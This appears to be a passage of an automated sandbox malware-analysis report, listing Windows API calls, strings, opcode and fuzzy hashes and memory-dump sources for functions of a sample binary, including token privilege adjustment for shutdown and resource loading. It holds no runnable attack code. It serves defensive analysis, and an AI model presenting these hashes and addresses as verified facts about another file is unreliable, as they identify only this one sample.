                                                                                    • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                                    • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                    • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                                    • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                    • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                                    • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                                    • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                    • String ID:
                                                                                    • API String ID: 3473537107-0
                                                                                    • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                    • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                                    • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                                    • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
                                                                                    APIs
                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                    • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                                    • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                                    • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                                    APIs
                                                                                    • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: SystemTime
                                                                                    • String ID:
                                                                                    • API String ID: 2656138-0
                                                                                    • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                    • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                    • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                    • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                    APIs
                                                                                    • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Version
                                                                                    • String ID:
                                                                                    • API String ID: 1889659487-0
                                                                                    • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                    • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                                    • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                                    • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                    • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                    • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                    • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 0040704D
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,004098D0), ref: 004070A1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressCloseHandleModuleProc
                                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                    • API String ID: 4190037839-2401316094
                                                                                    • Opcode ID: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                    • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                    • Opcode Fuzzy Hash: f61943fdfa50da717bbd8070568f426ad52e04842bfe5cc219f36a91d9520f2f
                                                                                    • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                    APIs
                                                                                    • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                    • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                    • String ID:
                                                                                    • API String ID: 1694776339-0
                                                                                    • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                    • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                    • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                    • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                    APIs
                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                    • LocalFree.KERNEL32(0046FE58,00000000,00401AB4), ref: 00401A1B
                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,0046FE58,00000000,00401AB4), ref: 00401A3A
                                                                                    • LocalFree.KERNEL32(0046E300,?,00000000,00008000,0046FE58,00000000,00401AB4), ref: 00401A79
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                    • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                    • String ID: $F$4F
                                                                                    • API String ID: 3782394904-545788489
                                                                                    • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                    • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                    • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                    • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                    APIs
                                                                                    • GetSystemDefaultLCID.KERNEL32(00000000,004055FC,?,?,?,?,00000000,00000000,00000000,?,004065DB,00000000,004065EE), ref: 004053CE
                                                                                      • Part of subcall function 004051FC: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                                      • Part of subcall function 00405248: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale$DefaultSystem
                                                                                    • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                    • API String ID: 1044490935-665933166
                                                                                    • Opcode ID: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                    • Instruction ID: af1252b4c964b6680b9f9af4a0d1ea0fc67f86ffa9d2e4d8722b1cefb330e960
                                                                                    • Opcode Fuzzy Hash: 85a59d6a8a9452990e87660af54c17acfa7fb51e8ac3fac4a02ccdeae7d05a60
                                                                                    • Instruction Fuzzy Hash: 25515334B04548ABDB00EBA59C91A9F776AEB89304F50947BB504BB3C6CA3DCE059B5C
                                                                                    APIs
                                                                                    • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                    • String ID: $F$4F
                                                                                    • API String ID: 730355536-545788489
                                                                                    • Opcode ID: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                    • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                    • Opcode Fuzzy Hash: aabd9570e7a52811c13604d6a46282fe49281d95e81aad3d3e53893a1864dea1
                                                                                    • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D
                                                                                    APIs
                                                                                    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                    • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExitMessageProcess
                                                                                    • String ID: Error$Runtime error at 00000000$9@
                                                                                    • API String ID: 1220098344-1503883590
                                                                                    • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                    • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                    • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                    • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                    • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                    • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocString
                                                                                    • String ID:
                                                                                    • API String ID: 262959230-0
                                                                                    • Opcode ID: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                    • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                    • Opcode Fuzzy Hash: b88b94e5f034f8c4e706f080a825eb7b192e10e2750b3458b8a97e0288adf81d
                                                                                    • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014B2
                                                                                    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014D7
                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,$F,?,?,?,00401800), ref: 004014FD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$Alloc$Free
                                                                                    • String ID: $F$4F
                                                                                    • API String ID: 3668210933-545788489
                                                                                    • Opcode ID: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                    • Instruction ID: d5dc587d839e3be782c9b7b9e1ff5a952950f17ebcccd457e3de013d7af40e21
                                                                                    • Opcode Fuzzy Hash: 53fb4fb4dead2bf9bf87b2a1222c08a4795459efffcdd9b971e00269c0061a0c
                                                                                    • Instruction Fuzzy Hash: 7CF0C8717403106AEB316E694CC5F533AD89F85754F1040BAFA0DFF3DAD6745800826C
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00409C56), ref: 004030E3
                                                                                    • GetCommandLineA.KERNEL32(00000000,00409C56), ref: 004030EE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommandHandleLineModule
                                                                                    • String ID: U1hd.@$`&E
                                                                                    • API String ID: 2123368496-1561014801
                                                                                    • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                    • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                    • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                    • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                    APIs
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,004098D0,00000000), ref: 00406E4C
                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: QueryValue
                                                                                    • String ID: )q@
                                                                                    • API String ID: 3660427363-2284170586
                                                                                    • Opcode ID: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                    • Instruction ID: 7350e5e82036d2c0193b98364cdb321f9e6d5b5bf7e48a12e03045d443e4f3bd
                                                                                    • Opcode Fuzzy Hash: 6b21a0d37a83e471fd9d1ddb0c1b743920aead1f80a5b526095c1b0a651cf177
                                                                                    • Instruction Fuzzy Hash: DC414C31D0021AAFDB21DF95C881BAFB7B8EB05704F56457AE901B7280D738AF108B99
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 004094F7
                                                                                    • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409507
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 0040951A
                                                                                    • GetLastError.KERNEL32(?,?,?,0000000D,?,0040A220,000000FA,00000032,0040A287), ref: 00409524
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.3299777411.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.3299745886.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299809276.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.3299842105.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1458359878-0
                                                                                    • Opcode ID: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                    • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                    • Opcode Fuzzy Hash: 597fcf42490b874720d4ad81cf19761f51130dad350fd41d24dc31ad960abd38
                                                                                    • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                    Execution Graph

                                                                                    Execution Coverage:14.4%
                                                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                                                    Signature Coverage:4.5%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:91
